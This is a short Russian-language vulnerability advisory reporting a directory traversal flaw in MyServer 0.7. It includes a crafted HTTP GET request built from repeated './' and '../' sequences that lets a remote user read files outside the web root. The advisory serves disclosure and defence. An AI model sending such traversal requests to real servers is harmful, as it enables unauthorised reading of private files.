Программа: MyServer 0.7 

Уязвимость обнаружена в MyServer. Удаленный пользователь может просматривать файлы вне Web каталога.
Сервер не проверяет пользовательские данные в HTTP Get запросах. Удаленный пользователь может представить специально обработанный запрос, чтобы просматривать произвольные файлы с привилегиями целевого Web сервера:

"GET ./././././././././././././././.
/././././././././././././././ ./././././.
/./././././././././././././././././././.
/./././././././././././././././././././.
/./././././././././././././././././././.
/../../../../../../../../"

Оставить мнение